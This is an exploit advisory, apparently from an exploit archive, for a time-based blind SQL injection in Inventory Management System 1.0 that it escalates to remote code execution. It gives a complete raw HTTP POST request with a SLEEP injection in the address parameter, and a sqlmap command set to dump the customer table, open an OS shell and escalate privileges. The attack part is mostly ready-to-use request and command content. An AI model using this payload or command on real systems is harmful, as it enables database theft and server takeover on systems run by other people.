Inventory Management System version 1.0 suffers from a remote SQL injection vulnerability that can be leveraged to gain remote code execution.
b55df996d938d43b025c9eccebb5e7d2
# Title: Inventory Management System 1.0 Blind SQLi To Rce
# Author: Hejap Zairy
# Date: 12.07.2022
# Vendor: https://www.vetbossel.in/inventory-management-system-php/
# Software: https://cutt.ly/lOZ8lrr
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache
#vulnerability Code php
```php
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'abhi@123' WHERE `cust`.`custid` = 'C200114'' at line 2
```
#Status: CRITICAL
[+] Payload POST:
```
POST /0day/Edit-Details.php HTTP/1.1
Host: 0day.gov
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Origin: https://0day.gov
Connection: close
Referer: https://0day.gov/0day/Edit-Details.php
Cookie: PHPSESSID=o0p5vujcgkn8pm6llls4nj7qq7
Upgrade-Insecure-Requests: 1
name=ABHI+boss&password=abhi%40123&phone=422234654&email=abhi1%40gmail.com&address=10+HOLME++STREET%27AND (SELECT 5316 FROM (SELECT(SLEEP(5)))Fohe)-- oRCH&cust_update=Submit+Query
```
#Blind SQLi Time to Rce
#ُExploit
sqlmap -r 0day_hejap.txt --hex --time-sec=17 --dbms=mysql --technique=t --random-agent --eta -p address -D order_mgmt -T cust --dump -hh --os-shell --priv-esc
# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc
# Proof and Exploit:
https://streamable.com/s09u80